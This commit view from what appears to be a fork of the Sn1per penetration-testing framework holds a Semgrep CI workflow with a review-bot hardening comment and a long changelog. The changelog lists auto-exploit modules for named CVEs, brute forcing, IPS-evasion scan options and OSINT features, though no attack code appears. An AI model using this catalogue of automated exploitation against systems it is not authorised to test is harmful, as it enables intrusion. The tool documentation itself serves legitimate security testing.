UltyScan Documentation Overhaul

2026-01-01 16:33:22 +11:00
commit f046dee832
294 changed files with 250370 additions and 0 deletions

.github/workflows/semgrep.yml vendored Normal file

@@ -0,0 +1,24 @@
on:
workflow_dispatch: {}
pull_request: {}
push:
branches:
- main
- master
paths:
- .github/workflows/semgrep.yml
schedule:
# random HH:MM to avoid a load spike on GitHub Actions at 00:00
- cron: 2 23 * * *
name: Semgrep
jobs:
semgrep:
name: semgrep/ci
runs-on: ubuntu-20.04
env:
SEMGREP_APP_TOKEN: ${{ secrets.SEMGREP_APP_TOKEN }}
container:
image: returntocorp/semgrep
steps:
- uses: actions/checkout@v3
- run: semgrep ci
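Review bot: the job runs with the default GITHUB_TOKEN permissions and every external dependency in this hunk is a mutable reference, so add a `permissions: contents: read` block (Semgrep only needs to read the checkout; `SEMGREP_APP_TOKEN` is a separate secret and is unaffected) and pin what can be pinned: `actions/checkout@v3` to a full commit SHA (preferably on the v4 line, since v3 is on a deprecated Node runtime), and `image: returntocorp/semgrep` to an explicit version tag plus `@sha256:` digest rather than the floating `latest` that a bare image name resolves to (the image is now published under the `semgrep/semgrep` name). `runs-on: ubuntu-20.04` names a GitHub-hosted runner label that has been retired, so the scheduled and PR runs will not get a runner; `ubuntu-latest` or a current LTS label is needed. Two smaller points: `secrets.SEMGREP_APP_TOKEN` is not available to `pull_request` runs from forks, so `semgrep ci` cannot authenticate there and the workflow should either accept those failures or pass an explicit `--config` fallback; and the `paths:` filter means a push to `main`/`master` only triggers a scan when this workflow file itself changes, which matches Semgrep's recommended template but deserves a comment so nobody assumes every push is scanned.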

CHANGELOG.md Normal file

@@ -0,0 +1,621 @@
## CHANGELOG:
* v9.2 - Added Tomba.io API integration via OSINT mode (Credit: @benemohamed)
* v9.2 - Fixed issue with gau tool not installing and updated GAU setting in confs
* v9.2 - Updated python2 to python3
* v9.2 - Removed Slurp tool
* v9.2 - Added BlackArch Dockerfile (Credit: @AnonymousWP)
* v9.2 - Updated DockerFile to latest Kali release (Credit: @AnonymousWP)
* v9.1 - Fixed issue with dirsearch installation/command syntax update
* v9.1 - Updated Nuclei sc0pe templates
* v9.1 - Fixed issue with Nuclei sc0pe parsers not working
* v9.1 - Fixed issue with GAU installer/commmand not working
* v9.1 - Fixed issue with passive URL fetching
* v9.1 - Fixed issue with nuclei not being installed
* v9.1 - Removed error in hackertarget URL fetching
* v9.1 - Added dnsutils to installer to fix missing deps
* v9.1 - Fixed issue with gau in webscan modes not running
* v9.1 - Updated subfinder to latest version
* v9.1 - Added new email spoofing security checks to OSINT mode (-o)
* v9.1 - Removed spoofcheck.py
* v9.1 - Updated timeout settings for curl which was causing sockets/scans to hang
* v9.1 - Fixed issue with Nuclei symlink missing in installer
* v9.1 - Fixed issue with Nuclei sc0pe parser not parsing results correctly
* v9.1 - Fixed issue with Dirsearch not running due to invalid command settings
* v9.1 - Fixed issue with Nuclei templates not being installed
* v9.1 - Fixed issue with enum4linux command not being installed
* v9.1 - Fixed HackerTarget API integration
* v9.1 - Fixed issue with ping command not being installed
* v9.1 - Fixed issue with carriage returns in conf
* v9.1 - Fixed issue with DNS resolution in 'discover' mode scans causing duplicate hosts
* v9.1 - Fixed issue with bruteforce running automatically due to changes in conf file
* v9.1 - Added verbose scan notifications for disabled conf options
* v9.1 - Updated default aux mode options in default sniper.conf
* v9.0 - Added Fortinet FortiGate SSL VPN Panel Detected sc0pe template
* v9.0 - Added CVE-2020-17519 - Apache Flink Path Traversal sc0pe template
* v9.0 - Added RabbitMQ Management Interface Detected sc0pe template
* v9.0 - Added CVE-2020-29583 Zyxel SSH Hardcoded Credentials via BruteX
* v9.0 - Removed vulnscan NMap CSV updates/downloads to save space/bandwidth
* v9.0 - Added Nuclei sc0pe parser
* v9.0 - Added Nuclei vulnerability scanner
* v9.0 - Added Wordpress WPScan sc0pe vulnerability parser
* v9.0 - Fixed issue with wrong WPscan API key command
* v9.0 - Added CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal sc0pe template
* v9.0 - Renamed AUTO_VULNSCAN setting to "VULNSCAN" in sniper.conf to perform vulnerability scans via 'normal' mode
* v8.9 - Tuned sniper.conf around performance for all scans and recon modes
* v8.9 - Added out of scope options to config
* v8.9 - Added automatic HTTP/HTTPS web scans and vulnerability scans to 'normal' mode
* v8.9 - Added SolarWinds Orion Panel Default Credentials sc0pe template
* v8.9 - Added SolarWinds Orion Panel sc0pe template
* v8.9 - Fixed issue with UDP port scans not working
* v8.9 - Fixed issue with theHarvester not running on Kali 2020.4
* v8.9 - Added WPScan API support
* v8.9 - Added CVE-2020-8209 - XenMobile-Citrix Endpoint Management Config Password Disclosure sc0pe template
* v8.9 - Added CVE-2020-8209 - XenMobile-Citrix Endpoint Management Path Traversal sc0pe template
* v8.9 - Removed verbose error for chromium on Ubuntu
* v8.9 - Added CVE-2020-8209 - Citrix XenMobile Server Path Traversal sc0pe template
* v8.9 - Fixed F+ in CSP Not Enforced sc0pe template
* v8.9 - Added CVE-2020-14815 - Oracle Business Intelligence Enterprise DOM XSS sc0pe template
* v8.9 - Fixed issue with dnscan not working in Kali 2020.3
* v8.9 - Fixed issue with screenshots not working in Ubuntu 2020
* v8.9 - Added Frontpage Service Password Disclosure sc0pe template
* v8.9 - Removed Yasuo tool
* v8.8 - Fixed issue with webscreenshot on Kali 2020.3+
* v8.8 - Fixed error in install.sh for theharvester sym link
* v8.8 - Fixed issue with flyover mode not capturing web screenshots
* v8.8 - Added automatic 'flyover' scans of all discovered domains for 'recon' mode
* v8.8 - Added static grep searching rules of all URL's and sub-domains (see sniper.conf for details)
* v8.8 - Added verbose status logging to flyover mode showing HTTP status/redirect/title, etc.
* v8.8 - Added integration for Port Scanner Add-on for Sn1per Professional
* v8.8 - Added enhanced scanning of all unique dynamic URL's via InjectX fuzzer
* v8.8 - Added CVE-2020-25213 - WP File Manager File Upload sc0pe template
* v8.8 - Added cPanel Login Found sc0pe template
* v8.8 - Added Wordpress WP-File-Manager Version Detected sc0pe template
* v8.8 - Added VMware vCenter Unauthenticated Arbitrary File Read sc0pe template
* v8.8 - Added PHP Composer Disclosure sc0pe template
* v8.8 - Added Git Config Disclosure sc0pe template
* v8.8 - Added updated NMap vulscan DB files
* v8.8 - Added CVE-2020-9047 - exacqVision Web Service Remote Code Execution sc0pe template
* v8.8 - Removed UDP port scan settings/options and combined with full portscan ports
* v8.8 - Added CVE-2019-8442 - Jira Webroot Directory Traversal sc0pe template
* v8.8 - Added CVE-2020-2034 - PAN-OS GlobalProtect OS Command Injection sc0pe template
* v8.8 - Added CVE-2020-2551 - Unauthenticated Oracle WebLogic Server Remote Code Execution sc0pe template
* v8.8 - Added CVE-2020-14181 - User Enumeration Via Insecure Jira Endpoint sc0pe template
* v8.8 - Added Smuggler HTTP request smuggling detection
* v8.8 - Added CVE-2020-0618 - Remote Code Execution SQL Server Reporting Services sc0pe template
* v8.8 - Added CVE-2020-5412 - Full-read SSRF in Spring Cloud Netflix sc0pe template
* v8.8 - Added Jaspersoft Detected sc0pe template
* v8.8 - Added improved dirsearch exclude options to all web file/dir searches
* v8.8 - Fixed naming conflict for theharvester
* v8.8 - Created backups of all NMap HTML reports for fullportonly scans
* v8.8 - Added line limit to GUA URL's displayed in console
* v8.7 - Added AvantFAX LOGIN Detected sc0pe template
* v8.7 - Updated web file bruteforce lists
* v8.7 - Added updated Slack API integration/notifications
* v8.7 - Added Arachni, Nikto, Nessus, NMap + 20 passive sc0pe vulnerability parsers
* v8.7 - Added CVE-2020-15129 - Open Redirect In Traefik sc0pe template
* v8.7 - Added MobileIron Login sc0pe template
* v8.7 - Added Revive Adserver XSS sc0pe template
* v8.7 - Added IceWarp Webmail XSS sc0pe template
* v8.7 - Added Mara CMS v7.5 XSS sc0pe template
* v8.7 - Added Administrative Privilege Escalation in SAP NetWeaver sc0pe template
* v8.7 - Added Magento 2.3.0 SQL Injection sc0pe template
* v8.7 - Added CVE-2020-15920 - Unauthenticated RCE at Mida eFramework sc0pe template
* v8.7 - Added CVE-2019-7192 - QNAP Pre-Auth Root RCE sc0pe template
* v8.7 - Added CVE-2020-10204 - Sonatype Nexus Repository RCE sc0pe template
* v8.7 - Added CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection sc0pe template
* v8.7 - Added CVE-2020-2140 - Jenkin AuditTrailPlugin XSS sc0pe template
* v8.7 - Added CVE-2020-7209 - LinuxKI Toolset 6.01 Remote Command Execution sc0pe template
* v8.7 - Added CVE-2019-16662 - rConfig 3.9.2 Remote Code Execution sc0pe template
* v8.7 - Added Sitemap.xml Detected sc0pe template
* v8.7 - Added Robots.txt Detected sc0pe template
* v8.7 - Added AWS S3 Public Bucket Listing sc0pe template
* v8.7 - Fixed logic error in stealth mode recon scans not running
* v8.7 - Added CVE-2020-7048 - WP Database Reset 3.15 Unauthenticated Database Reset sc0pe template
* v8.7 - Fixed F- detection in Wordpress Sc0pe templates
* v8.7 - Added CVE-2020-11530 - Wordpress Chop Slider 3 Plugin SQL Injection sc0pe template
* v8.7 - Added CVE-2019-11580 - Atlassian Crowd Data Center Unauthenticated RCE sc0pe template
* v8.7 - Added CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution Bypass sc0pe template
* v8.6 - Added new Sn1per configuration flow that allows persistent user configurations and API key transfer
* v8.6 - Updated port lists to remove duplicate ports error and slim down list
* v8.6 - Updated PHP to 7.4
* v8.6 - Added CVE-2020-12720 - vBulletin Unauthenticaed SQLi
* v8.6 - Added CVE-2020-9757 - SEOmatic < 3.3.0 Server-Side Template Injection
* v8.6 - Added CVE-2020-1147 - Remote Code Execution in Microsoft SharePoint Server
* v8.6 - Added CVE-2020-3187 - Citrix Unauthenticated File Deletion
* v8.6 - Added CVE-2020-8193 - Citrix Unauthenticated LFI
* v8.6 - Added CVE-2020-8194 - Citrix ADC & NetScaler Gateway Reflected Code Injection
* v8.6 - Added CVE-2020-8982 - Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
* v8.6 - Added CVE-2020-9484 - Apache Tomcat RCE by deserialization
* v8.6 - Added Cisco VPN scanner template
* v8.6 - Added Tiki Wiki CMS scanner template
* v8.6 - Added Palo Alto PAN OS Portal scanner template
* v8.6 - Added SAP NetWeaver AS JAVA LM Configuration Wizard Detection
* v8.6 - Added delete task workspace function to remove running tasks
* v8.6 - Added CVE-2020-3452 - Cisco ASA/FTD Arbitrary File Reading Vulnerability Sc0pe template
* v8.6 - Updated theharvester command to exclude github-code search
* v8.6 - Updated theharvester installer to v3.1
* v8.6 - Added urlscan.io API to OSINT mode (-o)
* v8.6 - Added OpenVAS package to install.sh
* v8.6 - Added Palo Alto GlobalProtect PAN-OS Portal Sc0pe template
* v8.6 - Fixed issue with Javascript downloader downloading localhost files instead of target
* v8.6 - Added CVE-2020-5902 F5 BIG-IP RCE sc0pe template
* v8.6 - Added CVE-2020-5902 F5 BIG-IP XSS sc0pe template
* v8.6 - Added F5 BIG-IP detection sc0pe template
* v8.6 - Added interesting ports sc0pe template
* v8.6 - Added components with known vulnerabilities sc0pe template
* v8.6 - Added server header disclosure sc0pe template
* v8.6 - Added SMBv1 enabled sc0pe template
* v8.6 - Removed verbose comment from stealth scan
* v8.5 - Added manual installer for Metasploit
* v8.5 - Added Phantomjs manual installer
* v8.5 - Added sc0pe template to check for default credentials via BruteX
* v8.5 - Added fullportscans to all 'web' mode scans to ensure full port coverage
* v8.5 - Fixed issue with 2nd stage OSINT scans not running
* v8.5 - Added port values to sc0pe engine to define port numbers
* v8.5 - Fixed issue with LinkFinder not working
* v8.5 - Fixed issue with Javascript link parser
* v8.5 - Added phantomjs dependency to fix webscreenshots on Ubuntu
* v8.5 - Added http-default-accounts NMap NSE to check for default web credentials
* v8.5 - Fixed several issues with install.sh to resolve deps on Ubuntu and Kali 2020.2
* v8.5 - Removed larger wordlists to reduce install size of Sn1per
* v8.5 - Added 20+ new active/passive sc0pe templates
* v8.5 - Fixed issue with installer on latest Kali and Docker builds
* v8.5 - Fixed custom installer for Arachni
* v8.5 - Fixed Dockerfile with updated Kali image (CC. @stevemcilwain)
* v8.4 - Added project "Sc0pe" active/passive vulnerability scanner
* v8.4 - Added 68 new active sc0pe templates
* v8.4 - Added 14 new passive sc0pe templates
* v8.4 - Added OWASP ZAP API integration
* v8.4 - Added 8 new Sn1per configuration templates (see /usr/share/sniper/conf/)
* v8.4 - Added Gau (https://github.com/lc/gau)
* v8.4 - Added rapiddns subdomain retrieval
* v8.4 - Updated web content wordlists
* v8.4 - Improved efficiency of 'web' and 'recon' mode scans
* v8.4 - Disabled legacy Metasploit web exploits (check Sn1per conf to re-enable)
* v8.4 - Fixed issue with dirsearch asterisk being used incorrectly
* v8.4 - Fixed issue with airstrike mode not updated Sn1per Professional v8.0 host list
* v8.4 - Fixed issue with webtech re.error: invalid group reference 1 at position 130
* v8.3 - Added Github subdomain retrieval (requires API key/conf options enabled)
* v8.3 - Added NMAP_OPTIONS setting to sniper.conf to configure optional NMap scan settings
* v8.3 - Added option to specify custom Sn1per configuration via (-c) switch
* v8.3 - Created several custom config files to select from, including: bug_bounty_quick, bug_bounty_max_javascript, super_stealth_mode, webpwn_only + more
* v8.3 - Added workspace --export option to backup/export a workspace
* v8.3 - Added flyover mode tuning options to sniper.conf
* v8.3 - Added GitGraber automated Github leak search (https://github.com/hisxo/gitGraber)
* v8.3 - Added static Javascript parsing for sub-domains, URL's, path relative links and comments
* v8.3 - Added js-beautifier
* v8.3 - Added LinkFinder Javascript link finder (https://github.com/GerbenJavado/LinkFinder)
* v8.3 - Added fprobe HTTP probe checker (https://github.com/theblackturtle/fprobe)
* v8.3 - Added Cisco RV320 and RV325 Unauthenticated Remote Code Execution CVE-2019-1653 MSF exploit
* v8.3 - Improved performance of 'stealth' and 'recon' modes
* v8.3 - Updated default port lists
* v8.3 - Improved performance of all port scans
* v8.3 - Added fix for missing Amass package
* v8.3 - Added sniper.conf options for OPENVAS_HOST and OPENVAS_PORT selection for remote instances
* v8.3 - Improved 'vulnscan' mode via OpenVAS to scan the same asset multiple times with improved error handling
* v8.2 - Added root priv check to sniper script to run
* v8.2 - Added NMap port change notifications via Slack
* v8.2 - Fixed issue with firefox not loading on Kali Linux 2020.1
* v8.2 - Fixed issue with Masswebscan mode not working
* v8.2 - Added Rails file exposure exploit CVE-2019-5418
* v8.2 - Updated wordlist selections to fingerprint common vulnerable applications
* v8.2 - Added h8mail compromised credentials check to OSINT (-o) mode
* v8.2 - Added Kali start menu app & icon for Sn1per
* v8.2 - Added check for insecure SSL/TLS connections
* v8.2 - Added NMAP_OPTIONS setting in ~/.sniper.conf to configure optional NMap settings
* v8.2 - Fixed issue with ManageEngine MSF exploit payload
* v8.2 - Added Spyse sub-domain enumeration tool (https://github.com/zeropwn/spyse.py)
* v8.2 - Fixed issue with Subjack (open /src/github.com/haccer/subjack/fingerprints.json: no such file or directory)
* v8.1 - Added Citrix Gateway Arbitary Code Execution CVE-2019-19781 vulnerability detection
* v8.1 - Added Pulse Secure VPN Arbitrary File Disclosure CVE-2019-11510 exploit
* v8.1 - Added --data-length=50 for NMap IPS evasion
* v8.1 - Removed NMap vulscan script due to F+ results
* v8.1 - Fixed issue with CRT.SH sub-domain retrieval
* v8.1 - Updated Kali Linux keyring package
* v8.1 - Fixed "[: ==: unary operator expected" in all code
* v8.1 - Updated Sn1per Professional autoload settings
* v8.1 - Updated web brute force wordlists
* v8.1 - Removed null and debug errors from passive spider API output
* v8.1 - Updated Commoncrawl index repo
* v8.1 - Updated DockerFile repository
* v8.1 - Fixed issue with -dh flag to delete host with Sn1per Pro v8.0
* v8.1 - Fixed issue with subfinder missing
* v8.1 - Fixed issue with 7zip missing
* v8.1 - Added check for Ubuntu to install.sh automatically
* v8.0 - Added ASnip tool to retrieve ASN's via 'recon' mode
* v8.0 - Added Shodan sub-domain lookup
* v8.0 - Added script timeout flag for NMap scripts
* v8.0 - Fixed issue with dnsenum getting stuck on gathering dns info stage
* v8.0 - Added option to force upgrade/install.sh without user prompt (ie. ./install.sh force)
* v8.0 - Fixed issue with theHarvester package on Ubuntu systems
* v8.0 - Fixed error "[: ==: unary operator expected" in all modes
* v8.0 - Added net-tools package for Ubuntu OS deps
* v7.4 - Added LDAP anomyous search to port 389/tcp checks (Shoutout @D0rkerDevil)
* v7.4 - Added Java RMI dump registry scan checks and exploits to port 8001/tcp (Shoutout @D0rkerDevil)
* v7.4 - Added CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure MSF module
* v7.4 - Added virtualhost scanning via web mode
* v7.4 - Added Gobuster
* v7.4 - Addd URLCrazy DNS alterations check to OSINT mode
* v7.4 - Added Ultratools Whois Lookups to OSINT mode
* v7.4 - Added Email-Format.com Email Retreival to OSINT mode
* v7.4 - Added Metasploit OSINT email retrieval to OSINT mode
* v7.4 - Added Hackertarget URL API retrieval to web modes
* v7.4 - Fixed error in massvulnscan mode
* v7.4 - Fixed issue with webscreenshot.py not running
* v7.4 - Added reverse whois DNS search via AMass
* v7.4 - Added MassDNS IP's to master sorted IP list
* v7.4 - Fixed issue with MassDNS installation
* v7.4 - Fixed bad path with DNSGen
* v7.4 - Fixed issue with AMass not running
* v7.4 - Improved performance of AltDNS/DNSgen/MassDNS retrieval
* v7.4 - Changed webscreenshot.py setting to use chrome browser and increased timeout
* v7.4 - Fixed issue with missing xmlstarlet package for OpenVAS scans
* v7.4 - Improved active web spider URL consolidation
* v7.3 - Added CVE-2019-15107 Webmin <= 1.920 - Unauthenticated RCE MSF exploit
* v7.3 - Added massdns plugin
* v7.3 - Added altdns plugin
* v7.3 - Added dnsgen plugin
* v7.3 - Updated web file/dir wordlists from public exploits and honeypots
* v7.3 - Added time stamps to all commands
* v7.3 - Removed CloudFront from domain hijacking checks
* v7.3 - Removed snmp-brute.nse script due to scan issues
* v7.3 - Fixed issue with discover scan workspace names
* v7.3 - Fixed issue with DockerFile (sed: can't read /usr/bin/msfdb: No such file or directory)
* v7.3 - Fixed issue with installer on docker not having pip installed
* v7.3 - Fixed issue with port 161 not being referenced correctly in scans
* v7.2 - Added experimental OpenVAS API integration
* v7.2 - Improved Burpsuite 2.x API integration with vuln reporting
* v7.2 - Added hunter.io API integration to recon mode scans
* v7.2 - Added Cisco IKE Key Disclosure MSF exploit
* v7.2 - Added JBoss MSF vuln scanner module
* v7.2 - Added Apache CouchDB RCE MSF exploit
* v7.2 - Added IBM Tivoli Endpoint Manager POST Query Buffer Overflow exploit
* v7.2 - Added Java RMI MSF scanner
* v7.2 - New scan mode "vulnscan"
* v7.2 - New scan mode "massportscan"
* v7.2 - New scan mode "massweb"
* v7.2 - New scan mode "masswebscan"
* v7.2 - New scan mode "massvulnscan"
* v7.2 - Added additional Slack API notification settings
* v7.2 - Improved NMap port detection and scan modes
* v7.2 - Fixed issue with Censys API being enabled by default
* v7.2 - Fixed verbose errors in subjack/subover tools
* v7.2 - Fixed issue with NMap http scripts not working
* v7.1 - Added BlueKeep CVE-2019-0708 MSF scanner
* v7.1 - Added automatic workspace generation for single target scans
* v7.1 - Added new slack.sh API integration script
* v7.1 - Added differential Slack notifications for new domains, new URL's and various scan outputs
* v7.1 - Added vulners and vulscan NMap scripts
* v7.1 - Added installer and support for Debian, Parrot and Ubuntu OS (install_debian.sh) (CC. @imhaxormad)
* v7.1 - Fixed various issues with the DockerFile
* v7.1 - Fixed/added Metasploit LHOST/LPORT values to all exploits based on sniper.conf settings
* v7.1 - Fixed issue with Amass/Golang 1.11 not installing correctly
* v7.0 - Added "webscan" mode for automated Burpsuite 2.x and Arachni web application scans only
* v7.0 - Added Slack API notifications (Disabled by default..check ~/.sniper.conf)
* v7.0 - Added new command switch to add daily, weekly or monthly sniper scheduled scans... check README
* v7.0 - Added scheduled scan tasks command switch (Needs additional configuration to setup... check README)
* v7.0 - Added Axis2 authenticated deployer MSF exploit
* v7.0 - Added Axis2 login brute force module
* v7.0 - Added subjack tool to check for subdomain hijacking
* v7.0 - Added sorted IP lists under $LOOT_DIR/ips/ips-all-sorted.txt
* v7.0 - Added subnet retrieval for all 'recon' mode scans under $LOOT_DIR/nmap/subnets-$TARGET.txt
* v7.0 - Added Webscreenshot.py and disabled cutycapt from default config
* v7.0 - Added Gobuster (Disabled by default..check ~/.sniper.conf)
* v7.0 - Fixed issue with SubOver not working due to bad path
* v7.0 - Fixed issue with flyover mode running 2x
* v6.3 - Added Drupal RESET Unserialize RCE CVE-2019-6340
* v6.2 - Added Glassfish Admin traversal MSF exploit
* v6.2 - Added ElasticSearch Java Injection MSF RCE exploit
* v6.2 - Added WebTech web fingerprinting tool
* v6.2 - Added censys subdomain retrieval and API key config
* v6.2 - Added project sonar sub-domain retrieval
* v6.2 - Added command switch to remove workspace (-d)
* v6.2 - Added command switch to remove host (-dh)
* v6.2 - Added DockerFile to run Sn1per in Docker (CC. Hariom Vashisth <hariom.devops@gmail.com>)
* v6.2 - Changed option to automatically import all NMap XML's into Metasploit's DB
* v6.2 - Changed option to automatically load Sn1per Professional's report when scans complete
* v6.2 - Added config option to enable/disable subdomain hijacking checks in sniper.conf
* v6.2 - Fixed issue with sniper --list command having invalid reference
* v6.2 - Fixed issue with theharvester not running
* v6.1 - Added automated web scanning via Burpsuite Pro 2.x API for all 'web' mode scans
* v6.1 - Added Waybackmachine URL retrieval to all web scans
* v6.1 - Converted all exploits to Metasploit
* v6.1 - Added configuration options to set LHOST/LPORT for all Metasploit exploits in sniper.conf
* v6.1 - Added improved web brute forcing dictionaries for all scan modes
* v6.1 - Added individual logging for all tools under the loot directory
* v6.1 - Added new sniper.conf options to enabled/disable all plugins and change settings per user
* v6.1 - Fixed issue with CMSMap install/usage
* v6.1 - Fixed issue with WPScan gem dependency missing (public_suffix)
* v6.1 - Fixed timeout setting in cutycapt
* v6.1 - Fixed issue with theharvester not running correctly
* v6.1 - Fixed issue with Amass not running due to invalid command line options in latest release
* v6.1 - Fixed issue with Sn1per Professional notepad.html missing
* v6.1 - Cleaned up plugins and install dependencies list
* v6.0 - Improved scan options for discover mode scans
* v6.0 - Fixed issue with pip3 dependency package missing
* v6.0 - Removed iceweasel from install.sh to fix apt error
* v5.9 - Fixed issue with auto updates not notifying users of updates
* v5.8 - Fixed issue with subfinder not working due to lack of wordlist switch
* v5.8 - Fixed missing osint directory/file paths
* v5.7 - Added libSSH auth bypass scanner CVE-2018-10933
* v5.7 - Added HTTP PUT method RCE MSF exploit
* v5.7 - Added sniper.conf scan configuration file to customize sniper environments by user
* v5.7 - Added modular scan mode source files
* v5.7 - Updated wordlists for improved performance and results
* v5.7 - Fixed issue with DNScan using an invalid path
* v5.6 - Changed automatic report generation to "ON" for Sn1per Pro users
* v5.5 - Added new multi-threaded high speed "flyover" mode added
* v5.5 - Added new scan status mode via (sniper --status) command
* v5.5 - Apache Struts CVE-2018-11776 RCE exploit
* v5.5 - Added Android Insecure ADB RCE auto exploit
* v5.5 - Added Apache Tomcat CVE-2017-12617 RCE exploit
* v5.5 - Added Oracle WebLogic WLS-WSAT Component Deserialisation RCE CVE-2017-10271 MSF exploit
* v5.5 - Added BlackWidow web application scanner with INJECTX fuzzer
* v5.5 - Added CVE-2018-15473 SSH user enumeration script
* v5.5 - Minor wordlist updates for web file brute forcing
* v5.4 - Updated Golang in install.sh
* v5.3 - Updated AMass repo in install.sh
* v5.3 - Removed CloudFail
* v5.3 - Fixed issue with subfinder missing brute force list
* v5.3 - Fixed issue with invalid dnsscan reference
* v5.2 - Added SubOver subdomain takeover scanner
* v5.2 - Added Subfinder subdomain enumeration tool
* v5.2 - Added Amass subdomain enumeration tool
* v5.2 - Added configurable modules/plugins to sniper script
* v5.2 - Added MS17-010 SMB Etternal Blue MSF exploit
* v5.2 - Added MSF Postgresql login scanner
* v5.2 - Added passive web spider
* v5.2 - Added WebDav metasploit aux modules
* v5.2 - Added NetBIOS NMap/MSF enumeration
* v5.2 - Added SMB MSF enumeration
* v5.2 - Added NSF MSF enumeration
* v5.2 - Added SSH MSF enumeration
* v5.2 - Added BadBlue Passthru MSF exploit
* v5.2 - Added SMB GPP MSF aux module
* v5.2 - Added Intel AMT MSF scanner
* v5.2 - Added MySQL MSF scanner
* v5.2 - Added MS03-026 DCOM RCE MSF exploit
* v5.2 - Added VNC no auth MSF scanner
* v5.2 - Added FTP MSF version scanner
* v5.2 - Added FTP anonymous access MSF scanner
* v5.2 - Added MS12-020 RDP MSF scanner
* v5.2 - Added MS10-061 Spoolss MSF exploit
* v5.2 - Added MS15-034 Sys Memory Dump MSF exploit
* v5.2 - Added MS06-040 Netapi MSF exploit
* v5.2 - Added MS05-039 PNP MSF exploit
* v5.2 - Added MS12-020 Max Channels RDP scanner
* v5.2 - Added JBoss status MSF scanner
* v5.2 - Added Apache Struts 2 REST Plugin XStream RCE check
* v5.2 - Added Apache Tomcat UTF8 Traversal MSF exploit
* v5.2 - Added Apache OPTIONS Bleed MSF exploit
* v5.2 - Added HP ILO Auth Bypass MSF exploit
* v5.2 - Added Jooma Comfields SQL injection MSF exploit
* v5.1 - Added dnscan to install.sh and updated sniper references which were broken
* v5.1 - Changed default brute force list for dnscan to improve performance of scans
* v5.1 - Removed CloudHunter and SubOver references (CC. 爱上平顶山)
* v5.0 - Added Sn1per Pro reporting interface (see https://sn1persecurity.com for more details)
* v5.0 - Added GPON Router RCE auto exploit
* v5.0 - Added Cloudapp.net Azure subdomain takeover check
* v5.0 - Added Cisco ASA Directory Traversal auto exploit (CVE-2018-0296)
* v5.0 - Added Wig Web Information Gatherer
* v5.0 - Added Dirsearch with custom dirsearch wordlists (quick, normal, full)
* v5.0 - Fixed bug in installer/upgrade which copied the local dir contents to the install dir
* v5.0 - Improved scan performance while taking web screenshots
* v5.0 - Fixed repo issue with Slurp (Shoutz to @ifly53e)
* v5.0 - Fixed issues with wrong ports listed in port scans (Shoutz to @ifly53e)
* v5.0 - Minor code fixes and typos corrected (Shoutz to @ifly53e)
* v5.0 - Updated "discover" mode scans for improved performance
* v4.5 - Added Apache Struts 2 CVE-2017-9805 and CVE-2017-5638 detection
* v4.5 - Added dirsearch web/file brute forcing
* v4.5 - Added smart file/directory brute forcing to all scan modes.
* v4.5 - Added subdomain brute force scan option to Sublist3r scan.
* v4.4 - Fixed issue with sniper nuke and airstrike modes not running.
* v4.4 - Added improved SNMP checks via NMap/Metasploit.
* v4.4 - Resolved dependency issue for nfs-common package.
* v4.4 - Fixed bug in sniper -fp command switch.
* v4.3 - Fixed bug in version info.
* v4.2 - Fixed bad merge in 4.1 causing sniper to break.
* v4.1 - Fixed a few bugs with various command line switches for airstrike and nuke modes.
* v4.1 - Fixed issue with path relative file inclusion via the -f flag. You can now include just the local filename (sniper -f targets.txt).
* v4.0 - Added new command switch options for all sniper scans (see --help for details)
* v4.0 - Added HTML formatted report for all workspaces to display screenshots, headers, reports and open ports
* v4.0 - Added optional scan options such as --recon, --osint, --fullportonly --bruteforce, etc. to selectively enable scan modules. (see --help for details)
* v4.0 - Improved Yasou scan options to include existing NMap XML files
* v4.0 - Added automatic HTML/TXT/PDF reporting for all scans by default
* v4.0 - Updated default workspace directory to store all loot files by $TARGET name or $WORKSPACE alias
* v4.0 - Added screenshot and header retrieval to loot storage
* v4.0 - Updated NMAP SMB enum script
* v3.0 - Improved performance of various sniper modes
* v3.0 - Added Aquatone domain flyover tool
* v3.0 - Added slurp S3 public AWS scanner
* v3.0 - Updated Sub-domain hijacking site list
* v3.0 - Changed look and feel of console output to help readability
* v3.0 - Added online/offline check to implement changes to scans when in online vs. offline mode
* v2.9 - New improved fullportonly scan mode
* v2.9 - Added online check to see if there's an active internet connection
* v2.9 - Changed default browser to firefox to clear up errors in loot commmand
* v2.9 - Created uninstall.sh script to uninstall sniper
* v2.9 - Removed automatic workspace creation per scan
* v2.9 - Added curl timeout in update command to fix lag
* v2.9 - Fixed minor NMap UDP scan flag issue
* v2.9 - Added Metagoofil
* v2.9 - Updated theharvester scan options to include more results
* v2.8 - Improved discovery mode scan performance and output
* v2.8 - Improved fullportonly scan performance
* v2.8 - Improved startup performance options
* v2.8 - Added Cansina web/file brute force tool
* v2.8 - Added webporthttp and webporthttps modes
* v2.8 - Added custerd software enumeration tool
* v2.7 - Fixed issue with sniper update command and install.sh not running
* v2.7 - Fixed errors with GooHak
* v2.7 - Fixed syntax errors in sniper conditional statements
* v2.7 - Added CloudFail
* v2.7 - Fixed issue with [: ==: unary operator expected errors
* v2.6 - Added Blackarch Linux support
* v2.6 - Added $BROWSER variable to set default browser
* v2.5g - Updated README with update command
* v2.5f - Fixes for various bugs reported and fixed by @ifly53e (https://github.com/1N3/Sn1per/pull/89)
* v2.5e - Fixed issue with port 3128/tcp checks (CC. @ifly53e)
* v2.5d - Added searchsploit option for (-v) to search all terms (CC. @ifly53e)
* v2.5c - Added various improvements to 'discover' mode scans
* v2.5b - Removed NMap script checks for 'fullportonly' mode
* v2.5a - Added auto-updates to check and download new versions
* v2.5a - Fixed issue with install.sh to resolve pip aha error
* v2.5a - Added libxml2-utils to install.sh to meet dependencies
* v2.5 - Added HTML report generation via sniper 'loot' command
* v2.5 - Added automatic NMap searchsploit integration to find exploits
* v2.5 - Added various improvements to Sn1per discovery scan mode
* v2.5 - Fixed issue with IIS BoF NMap script (CC. ifly53e)
* v2.4f - Fixed issue with upper NMap port range(CC. DaveW)
* v2.4e - Added NMap no ping switch to all scans
* v2.4d - Fixed issue with rpcinfo install script
* v2.4d - Fixed issue with Arachni install script
* v2.4c - Added loot and $TARGET sanity checks (CC. @menzow)
* v2.4b - Fixed issue with discovery scan output file (CC. @ifly53e)
* v2.4b - Fixed issue with Intel AMT RCE port list
* v2.4a - Added all NMap script checks via 'fullportonly' mode
